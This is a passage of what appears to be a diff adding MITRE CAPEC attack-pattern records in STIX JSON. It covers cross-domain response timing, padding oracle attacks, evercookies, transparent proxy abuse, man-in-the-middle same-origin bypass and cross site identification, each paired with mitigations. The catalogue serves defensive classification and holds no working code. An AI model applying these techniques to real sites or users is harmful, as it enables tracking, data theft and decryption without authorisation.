    Using a GET request, leverage the \"img\" tag in conjunction with \"onload() / onerror()\" javascript events to time a response
    Using a POST request, leverage the \"iframe\" element and use the \"onload()\" event to time a response

Exploit

  1. Infer information from the response time: After obtaining reponse times to various requests, the adversary will compare these times and infer potentially sensitive information. An example of this could be asking a service to retrieve information and random usernames. If one request took longer to process, it is likely that a user with that username exists, which could be useful knowledge to an adversary.

  2. Techniques
    Compare timing of different requests to infer potentially sensitive information about a target service
", + "x_capec_extended_description": "\n For GET requests an attacker could for instance leverage the \"img\" tag in conjunction with \"onload() / onerror()\" javascript events. For the POST requests, an attacker could leverage the \"iframe\" element and leverage the \"onload()\" event. There is nothing in the current browser security model that prevents an attacker to use these methods to time responses to the attackers' cross domain requests. The timing for these responses leaks information. For instance, if a victim has an active session with their online e-mail account, an attacker could issue search requests in the victim's mailbox. While the attacker is not able to view the responses, based on the timings of the responses, the attacker could ask yes / no questions as to the content of victim's e-mails, who the victim e-mailed, when, etc. This is but one example; There are other scenarios where an attacker could infer potentially sensitive information from cross domain requests by timing the responses while asking the right questions that leak information.\n ", + "x_capec_prerequisites": [ + "Ability to issue GET / POST requests cross domainJava Script is enabled in the victim's browserThe victim has an active session with the site from which the attacker would like to receive informationThe victim's site does not protect search functionality with cross site request forgery (CSRF) protection" + ], + "x_capec_resources_required": [ + "Ability to issue GET / POST requests cross domain" + ], + "x_capec_skills_required": { + "Low": "Some knowledge of Java Script" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: The victim's site could protect all potentially sensitive functionality (e.g. 
search functions) with cross site request forgery (CSRF) protection and not perform any work on behalf of forged requests", + "id": "course-of-action--f46f8204-a5a5-4d0b-927d-1204f8d80a35", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-462-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8f742a2-4f13-496c-ae38-b401f66aa531", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f46f8204-a5a5-4d0b-927d-1204f8d80a35", + "spec_version": "2.1", + "target_ref": "attack-pattern--5871f734-1898-4509-860c-f418cdf6b2ac", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: The browser's security model could be fixed to not leak timing information for cross domain requests", + "id": "course-of-action--91807008-54b1-456b-8522-5ba6ea9ca3b5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-462-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6c073f92-1bbc-43d5-92cf-3df1be18d378", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--91807008-54b1-456b-8522-5ba6ea9ca3b5", + 
"spec_version": "2.1", + "target_ref": "attack-pattern--5871f734-1898-4509-860c-f418cdf6b2ac", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.", + "external_references": [ + { + "external_id": "CAPEC-463", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/463.html" + }, + { + "external_id": "CWE-209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html" + }, + { + "external_id": "CWE-514", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/514.html" + }, + { + "external_id": "CWE-649", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/649.html" + }, + { + "external_id": "CWE-347", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/347.html" + }, + { + "external_id": "CWE-354", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/354.html" + }, + { + "external_id": "CWE-696", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/696.html" + }, + { + "description": "Juliano Rizzo, Thai Duong, Practical Padding Oracle Attacks, 2010--05---25", + "external_id": "REF-400", + "source_name": 
"reference_from_CAPEC", + "url": "https://www.usenix.org/legacy/events/woot10/tech/full_papers/Rizzo.pdf" + } + ], + "id": "attack-pattern--63048cb5-6d42-4fa2-a0e1-eeff2ef2a34d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Padding Oracle Crypto Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f" + ], + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "An adversary sends a request containing ciphertext to the target system. Due to the browser's same origin policy, the adversary is not able to see the response directly, but can use cross-domain information leak techniques to still get the information needed (i.e., information on whether or not a padding error has occurred). This can be done using \"img\" tag plus the onerror()/onload() events. The adversary's JavaScript can make web browsers to load an image on the target site, and know if the image is loaded or not. This is 1-bit information needed for the padding oracle attack to work: if the image is loaded, then it is valid padding, otherwise it is not." + ], + "x_capec_extended_description": "\n Any cryptosystem can be vulnerable to padding oracle attacks if the encrypted messages are not authenticated to ensure their validity prior to decryption, and then the information about padding error is leaked to the adversary. This attack technique may be used, for instance, to break CAPTCHA systems or decrypt/modify state information stored in client side objects (e.g., hidden fields or cookies). This attack technique is a side-channel attack on the cryptosystem that uses a data leak from an improperly implemented decryption routine to completely subvert the cryptosystem. 
The one bit of information that tells the adversary whether a padding error during decryption has occurred, in whatever form it comes, is sufficient for the adversary to break the cryptosystem. That bit of information can come in a form of an explicit error message about a padding error, a returned blank page, or even the server taking longer to respond (a timing attack). This attack can be launched cross domain where an adversary is able to use cross-domain information leaks to get the bits of information from the padding oracle from a target system / service with which the victim is communicating.\n ", + "x_capec_prerequisites": [ + "The decryption routine does not properly authenticate the message / does not verify its integrity prior to performing the decryption operation", + "The target system leaks data (in some way) on whether a padding error has occurred when attempting to decrypt the ciphertext.", + "The padding oracle remains available for enough time / for as many requests as needed for the adversary to decrypt the ciphertext." 
+ ], + "x_capec_resources_required": [ + "\n Ability to detect instances where a target system is vulnerable to an oracle padding attack\n Sufficient cryptography knowledge and tools needed to take advantage of the presence of the padding oracle to perform decryption / encryption of data without a key\n " + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use a message authentication code (MAC) or another mechanism to perform verification of message authenticity / integrity prior to decryption", + "id": "course-of-action--e62691da-d711-47e8-8c82-b97dcb9b3a05", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-463-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a67f1d51-adca-411e-89d1-92f674949ad3", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e62691da-d711-47e8-8c82-b97dcb9b3a05", + "spec_version": "2.1", + "target_ref": "attack-pattern--63048cb5-6d42-4fa2-a0e1-eeff2ef2a34d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Do not leak information back to the user as to any cryptography (e.g., padding) encountered during decryption.", + "id": "course-of-action--330dc21b-bad8-4391-98c9-c29f84c83208", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-463-1", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c01803b-7af5-4c55-98ce-633b944b0847", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--330dc21b-bad8-4391-98c9-c29f84c83208", + "spec_version": "2.1", + "target_ref": "attack-pattern--63048cb5-6d42-4fa2-a0e1-eeff2ef2a34d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker creates a very persistent cookie that stays present even after the user thinks it has been removed. The cookie is stored on the victim's machine in over ten places. When the victim clears the cookie cache via traditional means inside the browser, that operation removes the cookie from certain places but not others. The malicious code then replicates the cookie from all of the places where it was not deleted to all of the possible storage locations once again. So the victim again has the cookie in all of the original storage locations. In other words, failure to delete the cookie in even one location will result in the cookie's resurrection everywhere. 
The evercookie will also persist across different browsers because certain stores (e.g., Local Shared Objects) are shared between different browsers.", + "external_references": [ + { + "external_id": "CAPEC-464", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/464.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + }, + { + "description": "Forge Web Credentials: Web Cookies", + "external_id": "T1606.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1606/001" + }, + { + "description": "Samy Kamkar, Evercookie, 2010--09---09", + "external_id": "REF-401", + "source_name": "reference_from_CAPEC", + "url": "http://samy.pl/evercookie/" + } + ], + "id": "attack-pattern--ed57f38c-2f0c-47ad-a6e2-16932fde978f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Evercookie", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--ec382da0-af49-489b-bca1-a555d48b7ce3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n The places a persistent cookie is stored on a victim's machine include: Standard HTTP Cookies, Local Shared Objects (Flash Cookies), Silverlight Isolated Storage, Storing cookies in RGB values of auto-generated, force-cached, PNGs using HTML5 Canvas tag to read pixels (cookies) back out, Storing cookies in Web History, Storing cookies in HTTP ETags, Storing cookies in Web cache, window.name caching, Internet Explorer userData storage, HTML5 Session Storage, HTML5 Local Storage, HTML5 Global Storage, HTML5 Database Storage via SQLite, among others.\n ", + "x_capec_prerequisites": [ + "The victim's browser is not configured to reject all cookiesThe victim visits a website that serves the attackers' evercookie" + ], + 
"x_capec_resources_required": [ + "Evercookie source code" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Browser's design needs to be changed to limit where cookies can be stored on the client side and provide an option to clear these cookies in all places, as well as another option to stop these cookies from being written in the first place.", + "id": "course-of-action--613f9459-29ce-43e4-91dd-68f4e6148ef6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-464-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e1626045-707b-4f32-995a-db4309834849", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--613f9459-29ce-43e4-91dd-68f4e6148ef6", + "spec_version": "2.1", + "target_ref": "attack-pattern--ed57f38c-2f0c-47ad-a6e2-16932fde978f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Safari browser's private browsing mode is currently effective against evercookies.", + "id": "course-of-action--252ad1a2-1f99-45a1-a6b1-8ed47af8a5c5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-464-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8204979e-c9d8-4eee-a37d-f28d5d01c12e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--252ad1a2-1f99-45a1-a6b1-8ed47af8a5c5", + "spec_version": "2.1", + "target_ref": "attack-pattern--ed57f38c-2f0c-47ad-a6e2-16932fde978f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A transparent proxy serves as an intermediate between the client and the internet at large. It intercepts all requests originating from the client and forwards them to the correct location. The proxy also intercepts all responses to the client and forwards these to the client. All of this is done in a manner transparent to the client.", + "external_references": [ + { + "external_id": "CAPEC-465", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/465.html" + }, + { + "external_id": "CWE-441", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/441.html" + }, + { + "description": "Proxy: Internal Proxy", + "external_id": "T1090.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1090/001" + }, + { + "description": "Robert Auger, Socket Capable Browser Plugins Result In Transparent Proxy Abuse, 2009", + "external_id": "REF-402", + "source_name": "reference_from_CAPEC", + "url": "http://www.thesecuritypractice.com/the_security_practice/TransparentProxyAbuse.pdf" + } + ], + "id": "attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Transparent Proxy Abuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--ec382da0-af49-489b-bca1-a555d48b7ce3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n Transparent proxies are often used by enterprises and ISPs. For requests originating at the client transparent proxies need to figure out the final destination of the client's data packet. Two ways are available to do that: either by looking at the layer three (network) IP address or by examining layer seven (application) HTTP header destination. A browser has same origin policy that typically prevents scripts coming from one domain initiating requests to other websites from which they did not come. To circumvent that, however, malicious Flash or an Applet that is executing in the user's browser can attempt to create a cross-domain socket connection from the client to the remote domain. The transparent proxy will examine the HTTP header of the request and direct it to the remote site thereby partially bypassing the browser's same origin policy. This can happen if the transparent proxy uses the HTTP host header information for addressing rather than the IP address information at the network layer. 
This attack allows malicious scripts inside the victim's browser to issue cross-domain requests to any hosts accessible to the transparent proxy.\n ", + "x_capec_prerequisites": [ + "Transparent proxy is usedVulnerable configuration of network topology involving the transparent proxy (e.g., no NAT happening between the client and the proxy)Execution of malicious Flash or Applet in the victim's browser" + ], + "x_capec_skills_required": { + "Medium": "Creating malicious Flash or Applet to open a cross-domain socket connection to a remote system" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that the transparent proxy uses an actual network layer IP address for routing requests. On the transparent proxy, disable the use of routing based on address information in the HTTP host header.", + "id": "course-of-action--d939e9ad-f3d3-4c25-8ec4-fd98a3ffed73", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-465-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9ac63888-5744-4d6d-adf1-0adf39beb786", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d939e9ad-f3d3-4c25-8ec4-fd98a3ffed73", + "spec_version": "2.1", + "target_ref": "attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable in the browser the execution of Java Script, Flash, SilverLight, etc.", + "id": "course-of-action--e6df32f5-31e9-467d-bbd7-4146d1870ef4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-465-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--60c4dab5-4f4b-44f2-9098-04dc6db7b9a4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e6df32f5-31e9-467d-bbd7-4146d1870ef4", + "spec_version": "2.1", + "target_ref": "attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker leverages an adversary in the middle attack (CAPEC-94) in order to bypass the same origin policy protection in the victim's browser. This active adversary in the middle attack could be launched, for instance, when the victim is connected to a public WIFI hot spot. 
An attacker is able to intercept requests and responses between the victim's browser and some non-sensitive website that does not use TLS.", + "external_references": [ + { + "external_id": "CAPEC-466", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/466.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "description": "Roi Saltzman, Adi Sharabani, Active Man in the Middle Attacks, 2009--02---02, IBM Rational Application Security Group", + "external_id": "REF-403", + "source_name": "reference_from_CAPEC", + "url": "http://blog.watchfire.com/wfblog/2009/02/active-man-in-the-middle-attacks.html" + } + ], + "id": "attack-pattern--797a5be6-23ff-41bb-be85-51a9976867dd", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Leveraging Active Adversary in the Middle Attacks to Bypass Same Origin Policy", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n When an attacker intercepts a response bound to the victim, an attacker adds an iFrame (which is possibly invisible) to the response referencing some domain with sensitive functionality and forwards the response to the victim. The victim's browser than automatically initiates an unauthorized request to the site with sensitive functionality. 
The same origin policy would prevent making these requests to a site other than the one from which the Java Script came, but the attacker once again uses active adversary in the middle to intercept these automatic requests and redirect them to the domain / service with sensitive functionality. Any persistent cookies that the victim has in their browser would be used for these unauthorized requests. The attacker thus actively directs the victim to a site with sensitive functionality. When the site with sensitive functionality responds back to the victim's request, an active adversary in the middle attacker intercepts these responses, injects their own malicious Java Script into these responses, and forwards to the victim's browser. In the victim's browser, that Java Script executes under the restrictions of the site with sensitive functionality and can be used to continue to interact with the sensitive site. So an attacker can execute scripts within the victim's browser on any domains the attacker desires. The attacker is able to use this technique to steal cookies from the victim's browser for whatever site the attacker wants. This applies to both persistent cookies and HTTP only cookies (unlike traditional XSS attacks). An attacker is also able to use this technique to steal authentication credentials for sites that only encrypt the login form, but do not require a secure channel for the initial request to get to the page with the login form. Further the attacker is also able to steal any autocompletion information. This attack pattern can also be used to enable session fixation and cache poisoning attacks. 
Additional attacks can be enabled as well.\n ", + "x_capec_prerequisites": [ + "The victim and the attacker are both in an environment where an active adversary in the middle attack is possible (e.g., public WIFI hot spot)The victim visits at least one website that does not use TLS / SSL" + ], + "x_capec_skills_required": { + "Low": "Ability to intercept and modify requests / responses", + "Medium": "Solid understanding of the HTTP protocol" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Tunnel communications through a secure proxy", + "id": "course-of-action--d80b15df-ac31-4f96-a44b-854eae42d178", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-466-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ac76aec8-ae77-4b13-ae78-40f3c080cb27", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d80b15df-ac31-4f96-a44b-854eae42d178", + "spec_version": "2.1", + "target_ref": "attack-pattern--797a5be6-23ff-41bb-be85-51a9976867dd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Trust level separation for privileged / non privileged interactions (e.g., two different browsers, two different users, two different operating systems, two different virtual machines)", + "id": 
"course-of-action--b3cd2e0b-e09e-426b-b06b-018ee62ab500", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-466-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--27a38eca-f7d9-4b5e-b966-8e6d36a9dce2", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3cd2e0b-e09e-426b-b06b-018ee62ab500", + "spec_version": "2.1", + "target_ref": "attack-pattern--797a5be6-23ff-41bb-be85-51a9976867dd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker harvests identifying information about a victim via an active session that the victim's browser has with a social networking site. A victim may have the social networking site open in one tab or perhaps is simply using the \"remember me\" feature to keep their session with the social networking site active. An attacker induces a payload to execute in the victim's browser that transparently to the victim initiates a request to the social networking site (e.g., via available social network site APIs) to retrieve identifying information about a victim. 
While some of this information may be public, the attacker is able to harvest this information in context and may use it for further attacks on the user (e.g., spear phishing).", + "external_references": [ + { + "external_id": "CAPEC-467", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/467.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + }, + { + "description": "Ronen, Cross Site Identification - or - How your social network might expose you when you least expect it, 2009--12---27", + "external_id": "REF-404", + "source_name": "reference_from_CAPEC", + "url": "http://blog.quaji.com/2009/12/out-of-context-information-disclosure.html" + } + ], + "id": "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cross Site Identification", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An attacker may post a malicious posting that contains an image with an embedded link. The link actually requests identifying information from the social networking site. A victim who views the malicious posting in their browser will have sent identifying information to the attacker, as long as the victim had an active session with the social networking site." + ], + "x_capec_extended_description": "\n There are many other ways in which the attacker may get the payload to execute in the victim's browser mainly by finding a way to hide it in some reputable site that the victim visits. 
The attacker could also send the link to the victim in an e-mail and trick the victim into clicking on the link. This attack is basically a cross site request forgery attack with two main differences. First, there is no action that is performed on behalf of the user aside from harvesting information. So standard CSRF protection may not work in this situation. Second, what is important in this attack pattern is the nature of the data being harvested, which is identifying information that can be obtained and used in context. This real time harvesting of identifying information can be used as a prelude for launching real time targeted social engineering attacks on the victim.\n ", + "x_capec_prerequisites": [ + "The victim has an active session with the social networking site." + ], + "x_capec_skills_required": { + "High": "An attacker should be able to create a payload and deliver it to the victim's browser.", + "Medium": "An attacker needs to know how to interact with various social networking sites (e.g., via available APIs) to request information and how to send the harvested data back to the attacker." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Users should always explicitly log out from the social networking sites when done using them.", + "id": "course-of-action--af4647f0-e80a-49ba-a16d-3c064e63c678", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-467-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--57332d9a-c39c-4f6b-b1ce-569f45f621b8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--af4647f0-e80a-49ba-a16d-3c064e63c678", + "spec_version": "2.1", + "target_ref": "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Users should not open other tabs in the browser when using a social networking site.", + "id": "course-of-action--8127e61d-3ccd-4866-bd76-59c159eeeefe", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-467-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 